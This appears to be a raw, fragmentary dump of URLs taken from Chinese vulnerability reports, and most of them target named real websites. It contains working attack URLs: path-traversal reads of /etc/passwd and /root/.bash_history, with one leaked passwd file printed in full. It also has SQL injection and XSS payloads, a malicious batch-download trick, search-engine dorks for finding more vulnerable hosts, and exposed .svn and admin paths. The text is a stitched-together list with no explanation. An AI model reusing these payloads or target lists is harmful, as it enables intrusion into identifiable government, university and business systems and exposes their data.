http://mail.cnmo.com/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ CAMSWebService.asmx/ValidateSabreID http://cams.svcs.hp.com http://60.10.8.78/ http://drops.wooyun.org/papers/3771 http://suggestion.baidu.com/su;/1.bat;?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875然后它会弹出下载的页面。接着下载打开就直接执行这个了,详情还是要看看参考才行呢 http://mail.zol.com.cn/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://mail.xgo.com.cn/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://mail.abab.com/login.php?Lang=invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././ http://119.187.133.226:8282/opac/publicNotice/reservationInLib http://tuchuang.czlib.com.cn/opac/publicNotice/reservationInLib http://opac.hkc.edu.cn/opac/publicNotice/reservationInLib http://opac.lixin.edu.cn/opac/publicNotice/reservationInLib http://opac3.wzlib.cn/opac/publicNotice/reservationInLib http://218.27.88.203/opac/publicNotice/reservationInLib http://interlib.gzyxlib.cn:8008/opac/publicNotice/reservationInLib http://119.187.133.226:8282/opac/publicNotice/reservationInLib http://tuchuang.czlib.com.cn/opac/publicNotice/reservationInLib http://widash.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://www.phpyun.com/bbs/thread-8149-1-1.html http://www.phpyun.com/PHP%E4%BA%91%E4%BA%BA%E6%89%8D%E6%8B%9B%E8%81%98%E7%B3%BB%E7%BB%9FV3.2_Beta.rar https://h41183.www4.hp.com www4.hp.com http://cmccsh.wiwide.com/login http://www.zoomeye.org/ country:China http://61.131.97.246/ http://61.177.136.244/ http://61.177.136.248/ http://61.177.159.166/ http://61.177.136.234/ http://61.177.136.233/ http://zt.iciba.com/2014/xueba/table.php http://bbs.lenovo.com/changshuo/?handling=0 http://bbs.lenovo.com/changshuo/?handling=0 http://www.bjprd.com.cn/ http://202.113.128.61/tsweb/ http://202.113.128.61/tsweb/ebsys/fceform/common/djframe.htm?isfile=release&djsn=eb_runsql http://202.113.128.61/tsweb/ebsys/fceform/dj/eb_runsql.htm http://changanmeeting.app.bolaa.net/Login.aspx http://changanmeeting.app.bolaa.net/upload/news/detail/20141223/20141223143651_9319.asp http://changanmeeting.app.bolaa.net/1.asp http://www.minjiao.com/ http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=1%23 http://dict.qq.pinyin.cn/dict_list?sort1=%D3%CE%CF%B7&sort2=%CD%F8%D3%CE%27%20and%201=2%23 http://www.yyipo.gov.cn/zscqj/login.php?gotopage=%2Fzscqj%2F http://www.myhack58.com/Article/html/3/8/2014/41709.htm) http://wusttest.sinaapp.com/news.php?news_id=12 http://xxx.xxx.com/data/account/?uid=(number) http://7m9bar.bama555.com/data/account/?uid=1 http://www.bama555.com/auth/login www.bama555.com www.69juzi.com www.vson.cc http://7m9bar.bama555.com/data/account/?uid=100000 http://beijing.liebiao.com/qitajiameng/135842185.html http://www.julaibao.com/ http://www.431801.okwei.com/ http://www.okwe1.com/ http://www.nongyou.com.cn/ http://218.58.124.131:8002/newlist2.aspx?deptid=3942&id=220 http://60.217.72.17:7140/newlist2.aspx?deptid=3942&id=270 http://123.134.189.60/newlist2.aspx?deptid=3942&id=274 http://218.56.40.229:8000/newlist2.aspx?deptid=3942&id=273 http://222.135.76.147:8100/newlist2.aspx?deptid=144&id=219 http://222.134.154.214:8000/newlist2.aspx?deptid=3942&id=249 http://www.notery.net/ http://www.notery.net/npage.asp?id=19 http://域名/sys/ http://www.hzgzc.com/2009/ http://dxgzccn.cnc119.000pc.net/ http://www.bygzc.cn/old/ http://www.hhhtgzc.com/ http://www.bhgzc.com/ http://sggzccn.cnc506.000pc.net/ http://61.187.56.43:8080/econ/ http://61.187.56.43:8080/Report/index.jsp http://album.zhenai.com/login/login.jsp?exit=1 http://www.jit.com.cn/ http://122.143.239.70:8090/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1736 http://222.160.175.90/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1769 http://218.27.190.107:8080/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1622 http://222.34.78.21/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=2189 http://222.160.140.29:8000/zwdtSjgl/Directory/showNsjg.jsp?NsjgId=1625 svn://112.124.104.112/vlinkage/code svn://112.124.104.112/vlinkage http://www.zugame.com/ http://jxjh.zugame.com/ http://jxjh.zugame.com/admin/login.aspx http://wooyun.org/bugs/wooyun-2010-069817 http://hea.gov.cn)出现服务器任意文件下载漏洞,包括passwd等,甚至/root/.bash_history查看管理员操作的历史记录,通过进一步渗透得知服务器是Suse http://hea.gov.cn/manage/content/docmanage/download.jsp?filePath=../etc/passwd http://hea.gov.cn/manage/content/docmanage/download.jsp?filePath=../root/.bash_history http://help.chinac.com服务器上有两个废弃站未删除,http://help.chinac.com:83还有,http://help.chinac.com:85,其中http://help.chinac.com:83/有phpmyadmin,root密码未猜测出来,http://help.chinac.com:85是论坛,uc_server存在弱口令,进入后查看应用管理,找到root密码,很幸运的是root密码正确,回到http://help.chinac.com:83/phpmyadmin http://www.lcwscgs.com/wscgs/liuyan.do http://60.211.179.22:9080/wscgs/liuyan.do http://58.59.39.43:9080/wscgs/liuyan.do http://cgs.qdpolice.gov.cn:9080/wscgs/liuyan.do http://218.59.228.162/wscgs/liuyan.do http://cgs.ytjj.gov.cn:9061/wscgs/liuyan.do http://www.wfcgs.com:9080/wscgs/liuyan.do http://www.bzwscgs.com:9080/wscgs/liuyan.do http://60.213.185.51:9080/wscgs/liuyan.do http://cgs.ijiaotong.com:9080/wscgs/liuyan.do http://60.211.179.22:9080/wscgs/liuyan.do http://extra.lenovo.com/ams/mod1_app2.php http://extra.lenovo.com/ams/mod1_app2.php?apply_content_exp=!%3D&apply_content_value=&datagrid_action=search&datagrid_page=1&id_exp=!%3D&id_va https://github.com/suxianbaozi/cache/blob/869bbda6ba0aaa267ca5b7f3abec1b6b747fdf4b/app-core/config/email.php http://www.jit.com.cn/ http://218.27.207.22/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://139.209.60.6/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://218.27.140.5/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://218.62.81.171/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://61.232.168.107/zwdtSjgl/info/dongtai_iframe.jsp?cid=4 http://jsids.telecomjs.com http://jsids.telecomjs.com/ida40/module/open/page/query/queryBill.xhtml?operID=tz61735&hashCode=FCFD64964473DAFC5D82E38F5DD261E1 https://tender.wanda.cn/ https://tender.wanda.cn/file!download.ajax?id=365584 https://tender.wanda.cn/ https://tender.wanda.cn/announcement_template!listWeb.ajax http://wdcwx.wanda.cn/wanda.cn.rar http://shake.sd.chinamobile.com/ http://mail.hngytobacco.com/ http://mail.hngytobacco.com/webmail7/useraddress_list.jsp http://www.xt12365.gov.cn/newsshow_p.asp?l_c_id=465&id=465 http://www.ee.sdu.edu.cn/xuandao/teachers.php?user_id=76 http://www.ee.sdu.edu.cn/xuandao/teachers.php?user_id=76 http://www.ee.sdu.edu.cn/xuandao/teachers.php?user_id=76 http://www.sgklt.com/forum.php?mod=viewthread&tid=2529 http://suggestion.baidu.com/su;/1.bat?wd=&cb=calc||&sid=1440_2031_1945_1788&t=1362056239875 http://union.51wp.com/index.php?r=admin www.hangzhouit.gov.cn http://220.191.211.247:8400/public/login/preLogin.action http://220.191.211.247:8400/risen/public/forcePwd.action http://202.98.11.84/ http://202.98.11.95:88/info.php https://wap.wuhan.wandamoviepark.com/ https://wap.wuhan.wandamoviepark.com/Activate/PersonalDetail/WA20141224231220803 http://www.wandafilm.com/threeKingdoms.do?m=getLotteryAlluser http://www.wandafilm.com/teeOil.do?m=getTeeOilPrizeNameList http://www.hfnhsw.com/nhdetailpro.php?id=12 http://www.hfnhsw.com/newsdetaile.php?id=4 http://www.hfnhsw.com/nhdetailproe.php?id=12 http://www.biosundrug.com/newsdetaile.php?id=1 http://www.sulipharma.com/newsdetaile.php?id=13 http://www.ensky-chemical.com/newsdetaile.php?id=17 http://www.genabolix.com/newsdetaile.php?id=9 http://www.fortunachem.com/newsdetaile.php?id=2 inurl:article.aspx?columntitle= http://www.bdxzfw.cn/portal/xzsp_baodingshi/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://60.220.240.7/portal/xzsp_changzhi/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.gyxzfw.net/portal/xzsp_xianqu/article.aspx?columntitle=%E6%9C%BA%E6%9E%84%E8%AE%BE%E7%BD%AE http://121.18.89.108/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E7%94%B5%E8%AF%9D http://www.lxxzfwzx.com/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.axxzfwzx.com/portal/xzsp2/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E7%94%B5%E8%AF%9D http://www.gjzwzx.cn/portal/xzsp3/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.zzxzfwzx.com/portal/xzsp2/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.ynxzwfw.gov.cn/portal/xzsp_yongnianxian/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://www.xsxzfwzx.com/portal/xzsp_xianqu/article.aspx?columntitle=%B4%B0%BF%DA%B5%E7%BB%B0 http://www.gbdqyw.com/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://222.222.180.76:8002/portal/xzsp_xianqu/article.aspx?columntitle=%E7%AA%97%E5%8F%A3%E5%88%86%E5%B8%83 http://60.220.240.7/portal/xzsp_changzhi/article.aspx?columntitle=%E7%A http://www.sqlmap.org www.jxjava.com http://125.77.200.135:8000/ http://my.gfan.com/resete http://wooyun.org/bugs/wooyun-2014-086052 inurl:xianhuoshow.asp?id= http://www.meng008.com/xianhuoshow.asp?id=65 http://www.meng008.com/news.asp?id=1&key=%EF%BF%BD%D0%B3%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD%EF%BF%BD http://www.meng008.com/xianhuo.asp?product_name=&page=2&type= http://www.meng008.com/xianhuoshow.asp?id=42 http://www.sqlmap.org www.meng00 https://github.com/kaven276/dialbook/blob/master/imp/eipmail.sql http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=%CE%E4%D4%F2%CC%EC&nowType=lottery%22%22%3E%3Cscript%3Ealert%281%29%3C/script%3E&site=iqiyi http://zsjggw.xnu.edu.cn/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://p.hsort.com/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://p.xyhuatai.com/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://dztb.cufe.edu.cn/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://epaper.btwhw.com/showLarger.aspx?paperName=a&qnum=2014&pagenum=1 http://zsjggw.xnu.edu.cn/show.aspx?paperName=%E6%B9%98%E5%8D%97%E5%AD%A6%E9%99%A2%E6%8A%A5&qnum=20110628 http://p.hsort.com/show.aspx?paperName=%E6%B9%98%E5%8D%97%E5%AD%A6%E9%99%A2%E6%8A%A5&qnum=20110628 http://dztb.cufe.edu.cn/show.aspx?paperName=a&qnum=20110628 http://epaper.btwhw.com/show.aspx?paperName=a&qnum=20110628 http://mswkt.xxtyd.fj.cn http://mswkt.xxtyd.fj.cn/ms/detail/?id=2&p=2 http://219.141.216.41:88/Manager/default.aspx http://219.141.216.41:8080/Manager/default.aspx www.bjflyz.com http://www.bjflyz.com:801/law/site/site-case-info!toQuery.action http://job.cqupt.edu.cn//main/job/1/ http://job.cqupt.edu.cn//main/news/0/1/ http://netsecurity.51cto.com/art/201004/194888.htm http://1gmt.l.mob.com/BLLDZ http://weibo.com www.oooxm.com http://mp.weixin.qq.com http://www.jeenor.com/cn/newscat.asp?classid=10 http://www.cxgd-led.com/cn/newscat.asp?classid=2 http://www.wysyy.cn/cn/newscat.asp?classid=6 http://exporterkm.com/cn/newscat.asp?classid=1 http://www.shyuanhao.com/cn/newscat.asp?classid=10 http://trutecled.com/cn/newscat.asp?classid=1 http://www.xlyumei.com/cn/newscat.asp?classid=7 http://xiangshuncaster.com/cn/newscat.asp?classid=1 http://yitaijinli2013.gotoip2.com/cn/newscat.asp?classid=3 http://www.jeenor.com/cn/newscat.asp?classid=10 http://www.cxgd-led.com/cn/newscat.asp?classid=2 http://www.wysyy.cn/cn/newscat.asp?classid=6 http://www.mafengwo.cn/path/?from=headdrop http://wiclub.wiwide.com/.svn/ http://www.linuxidc.com/Linux/2012-07/65702.htm http://topic.cnmo.com/active/blog_wall.php?topic_id=346&userid=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT%280x71746a6371,0x476d52624d5043624768,0x7164766771%29,NULL# http://210.36.80.99/pks/ http://port.okwei.com/FindPassword.aspx www.xxfda.gov.cn/m/index.php存在严重的sql注入,将各种提交参数改为自己构造的sql语句可以查询数据库的敏感数据 http://www.xagj.com.cn/tag.aspx?tag_name=%E6%97%85%E6%B8%B8 http://www.xagj.com.cn/tag.aspx?tag_name=%E6%97%85%E6%B8%B8'%20--%20- http://www.xagj.com.cn/tag.aspx?tag_name=%E6%97%85%E6%B8%B8 http://mclub.migu.cn/cp.php?ac=thread&op=edit&pid=4713151&tagid=798 http://fgw.akss.gov.cn/admin/admin.asp http://abs-core.sf-express.com/api/user/getCoupons http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi http://api.open.baidu.com/pae/ecosys/page/lottery?type=video&wd=xx&nowType=lottery&site=iqiyi%27%22xxx http://os.jcloud.com/ http://www.zhengzh.12306.cn/Dzsw/Shky/hwky.wai/quickorder.action http://www.sheny.12306.cn/Dzsw/Shky/hwky.wai/quickorder.action http://www.lanzh.12306.cn/Dzsw/Shky/hwky.wai/quickorder.action http://www.nanch.12306.cn/Dzsw/Shky/hwky.wai//quickorder.action http://www.shangh.12306.cn/Dzsw/Shky/hwky.wai//quickorder.action http://www.guangzh.12306.cn/Dzsw/Shky/hwky.wai//quickorder.action inurl:webs inurl:lib inurl:action http://www.lib.ruc.edu.cn//admin/user_logon.action http://lib.shzu.edu.cn//admin/user_logon.action http://lib.kluniv.cn//admin/user_logon.action http://lib.xzmy.edu.cn//admin/user_logon.action http://www.lib.tyut.edu.cn//admin/user_logon.action http://lib.jlnu.edu.cn/admin/user_logon.action http://lib.bicea.edu.cn//admin/user_logon.action http://lib.kluniv.edu.cn//admin/user_logon.action http://www.whlib.gov.cn//admin/user_logon.action http://lib.fzxy.edu.cn//admin/user_logon.action http://leshan.139mm.cn/web/webhtml/yuyue.aspx?yyid=10 http://www.xatourism.gov.cn/Entertainment/entertainment_list.aspx?type=traffic&pid=220&id=222 http://www.jit.com.cn/ http://www.ilj.gov.cn/zwdtSjgl/infoDetail.jsp?id=461 http://218.62.81.171/zwdtSjgl/infoDetail.jsp?id=461 http://218.62.100.33:8000/zwdtSjgl/infoDetail.jsp?id=146 http://zwgk.wangqing.gov.cn/zwdtSjgl/infoDetail.jsp?id=121 http://218.62.90.168/zwdtSjgl/infoDetail.jsp?id=636 http://www.sciencep.com/e_second.php?id=44 https://124.238.218.79/ http://www.jit.com.cn/ http://www.ilj.gov.cn/zwdtSjgl/Directory/showDir.jsp?keyid=PI201307051520180523 http://218.27.207.21/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841 http://zwgk.wangqing.gov.cn/zwdtSjgl/Directory/showDir.jsp?keyid=PI201412181107440207 http://218.62.81.171/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841 http://218.62.100.33:8000/zwdtSjgl/Directory/showDir.jsp?keyid=PI201101131105070841 http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx http://www.wahaha.com.cn/FSDownloadServlet?file_key=20140619074133653296.docx&file_name=2014年纸箱招标公告.docx http://wx.csrcbank.com/active/index.php?action=ertonghuihua&type=pc&do=show&id=9743 http://wx.csrcbank.com/active/index.php?action=ertonghuihua&type=pc&do=show&id=9743 http://122.224.212.80:8080/html/login/Login.jsp site:wiwide.com http://profession3.wiwide.com/.svn/entries http://portalc.wiwide.com/.svn/entries http://widash-lz.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://profession3.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://portalc.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://211.101.12.78:7777/uploadify/scripts/_notes/dwsync.xml http://liangan.wiclub.wiwide.com/uploadify/scripts/_notes/dwsync.xml http://yzb.sjtu.edu.cn/tutor/showTutorPic.ahtml?dsgh=../../../../../../../../../../etc/passwd%00.jpg root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rtkit:x:499:496:RealtimeKit:/proc:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin saslauth:x:498:76:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin gschool:x:500:500:gschool:/home/gschool:/bin/bash pfeng:x:501:500::/home/gschool/workspace/information/mis/manager:/sbin/nologin photo:x:502:50::/usr:/sbin/nologin mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash wisedu:x:503:503::/home/wisedu:/bin/bash squid:x:23:23::/var/spool/squid:/sbin/nologin http://www.lsqx.com/Knowledge/Details.aspx?ID=72 http://zb.sdo.com/ http://shixin.court.gov.cn http://shixin.court.gov.cn/personMore.do http://shixin.court.gov.cn/detail?id=921384 www.taizhou.gov.cn www.zpgt.gov.cn www.njqh.gov.cn www.wugang.gov.cn www.wugang.gov.cn soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance xmlns:xsd="http://www.w3.org/2001/XMLSchema xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/ xmlns:rec="http://receive.blf.jcms soapenv:Header/ soapenv:Body rec:wsGetWeb soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/ xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string xsi:type="xsd:string rec:wsGetWeb soapenv:Body soapenv:Envelope http://www.changde.gov.cn/jcms/services/WSSynchronize?wsdl http://www.cshtz.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdjs.gov.cn/jcms/service/WSSynchronize?wsdl http://www.njqh.gov.cn/jcms/service/WSSynchronize?wsdl http://www.lg.gov.cn/jcms/service/WSSynchronize?wsdl http://gzw.zj.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sqsc.gov.cn/jcms/service/WSSynchronize?wsdl http://www.dongtai.gov.cn/jcms/services/WSSynchronize?wsdl http://www.sdfgw.gov.cn/jcms/service/WSSynchronize?wsdl http://ipad.zaozhuang.gov.cn/jcms/service/WSSynchronize?wsdl http://www.taizhou.gov.cn/jcms/service/WSSynchronize?wsdl http://www.sihong.gov.cn/jcms/services/WSSynchronize?wsdl http://ggzy.jinan.gov.cn/jcms/services/WSSynchronize?wsdl http://www.wugang.gov.cn/jcms/services/WSSynchronize?wsdl http://www.gzlps.gov.cn/jcms/services/WSSynchronize?wsdl http://www.zpgt.gov.cn/jcms/services/WSSynchronize?wsdl http://www.taojiang.gov.cn/jcms/services/WSSynchronize?wsdl http://tz.lda.gov.cn/jcms/service/WSSynchronize?wsdl http://www.huimin.gov.cn/jcms/service/WSSynchronize?wsdl http://autoweb.zjwst.gov.cn/jcms2.5//services/WSSynchronize?wsdl http://www.cncn.gov.cn/jcms/services/WSSynchronize?wsdl http://jsxy.zucc.edu.cn/jcms/services/WSSynchronize?wsdl http://www.gzdpc.gov.cn//jcms/services/WSSynchronize?wsdl http://www.ceec.net.cn/jcms/services/WSSynchronize?wsdl 